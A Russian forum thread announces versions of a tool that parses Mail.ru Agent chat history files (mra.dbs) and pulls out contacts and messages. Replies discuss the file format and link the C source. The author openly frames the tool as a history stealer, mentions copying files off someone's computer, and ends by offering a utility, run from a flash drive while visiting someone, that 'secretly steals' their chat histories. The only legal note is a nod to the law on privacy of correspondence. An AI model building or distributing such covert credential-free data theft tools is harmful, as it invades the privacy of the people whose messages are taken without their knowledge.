![]() |
Mail.ru History Reader 2.3 RC
Перед использованием ознакомься со статьей 138 УК РФ
Программа: Mail.ru History Reader 2.3 RC Особенности: Благодаря наводке великого SOLON7 была выявлена зависимость и формат хранения даты сообщения! Описание: После волшебного пенделя, мной была полностью переписана программа теперь она весит 3 072 байта :D и выдергивает лишь сообщения. Тестирования проводились на dbs 5.6 версии агента (да и старые он тоже похоже нормально кушает). Параметры запуска тоже поменялись: magent-hr2.3 file.dbs outfile.txt >>> [КАЧАЕМ] <<< Программа: Mail.ru History Reader 2.0 Особенности: теперь может читать истории агента версии >= 5.4 !!! Описание: Это как бы бетка. Потому что полностью разобраться с форматом файла мне не удалось :( я лишь нашел, за что можно зацепится и решил навоять программку. В итоге из базы mra.dbs можно выдрать все емаилы с которыми переписывался человек и естественно почитать все сообщения (правда без дат и вперемешку, ибо я не разобрался). В ближайшие дни опишу в своем бложике алгоритмы и все что мне удалось откопать в волшебном файле mra.dbs З.Ы: если открыта программа Mail Agent файл mra.dbs НЕДОСТУПЕН! >>> [КАЧАЕМ] <<< > Инструкция пользователя 1.2, дополнение 2,0 [ОПИСАНИЕ ФОРМАТА ИСТОРИИ < 5.4]Программа: Mail.ru History Reader 1.2 final Особенности: Программа лишина багов и лиха работает с памятью ибо копирует она туда сюда только 36 байт (можно было и 8, но лень)! остальное анализирует и переваривает сразу в файл. Описание: Консольная версия с подробным выводом отчета о действиях. Читает все что только у меня было. В планах: Написание оконого интерфейса - оболочки Бонус: В архиве лежит исходник... мой кратив воспаленного мозга (щас у нас 5:53) >>> [КАЧАЕМ] <<< > воровалка историй -------------------------------------------------- Программа: Mail.ru History Reader 1.1 Особенности: Консольная версия! НЕ ВЫЛЕТАЕT Возможные баги: общий буффер под сообщение равен 5 МБ ... поэтому возможно переполнение. Нет терпения разбираться с RTF поэтому собственный парсер не обрабатывает сообщения, начинающиеся со знаков препинания (ну лень мне, потом доделаю...). Может че упустил при работе с памятью - будут баги пишите! Описание: Запускайте программу под CMD и глядите, что она возвращает Цитата:
>> Скачать --------------------------------------------------------------------- Программа: Mail.ru History Reader 1.0 Язык: Cи + winAPI // Visual Studio 2008 Размер: 75 КБ (ибо статическая линковка) Особенности: Анализирует папку Mra и подкаталоги, красиво формируя отчет (была идея сделать сортировку, но влом). Конечно же, можно открывать файлы и по отдельности. Описание: Как понятно из названия программа читает файлы истории маил агента (до версии 5.4 новой - говорят, переделали там шифрование, еще не смотрел), которые легко слить с компа выполнив 2 команды: Код:
cd C:\Documents and Settings\user\Application Data\Mra\http://zona-chat.narod.ru/mailread/mailread.gif >> Скачать |
У меня вылетает..(( агент 5.3
|
Попробуй маленькие истории открыть должно работать. В консольной версии никаких проблем не было, тут ошибки из-за этого интерфейса т.к я тут замахнулся на собственную прорисовку ListBox => глюки...
Если нужно я могу выложить исходники или же объяснить как шифрует агент. Консольную версию я делал лишь для тестирования алгоритма разбора файла, но могу и ее доработать если комуто эта программа ваще нужна :) |
Нет возможности работать тестером... я проверил консольную версию на самом большом файле что у мя был истории... но он был версии старше 1 (пошли от версии 5 UNICODE)
|
Выложите пожалуйста исходники.
|
Спешал фор _Psi_
http://zona-chat.narod.ru/mailread/histread.cpp http://zona-chat.narod.ru/mailread/stdafx.h Отладочная инфа закоменчена... структура head_pack2 отражает заголовок описаный мной в доке. функция rtf2char замах на конвертор из rtf в текст... в общем можно лучше и нужно лучше ) ... на асме чтоль переписать :) |
внимание обновление все смотрим вверх
|
"внимание обновление все смотрим вверх"
Обновление это под версию 5,4 будет работать или только под 5,3 как в шапке написано? |
o_O походу до версии 5,3 ибо в 5,4 он начинает юзать
вот это C:\Documents and Settings\user\Application Data\Mra\Base\mra.dbs щас смотрю формат файла... шифрования не видать зато сделано как то замудрено типа значений и ключиков всяких... да все там теперь. Механизм терь совсем другой хранения надо разбиратся, но удобно все типа базы... разбиратся чет не тянет |
Чето оболочку мне лень делать :) если кому надо могу просто подробную инструкцию написать, как использовать пошагово.
Вот выкладываю утилку которая незаметно тырит истории. Вам остается только скопировать ее себе на флешку придти в гости вставить флеху и незаметно пускануть этот файлик :) > [СКАЧАТЬ] < архив утилка + rar.exe иходник (win32 project empty VS2008) |
| Время: 03:27 |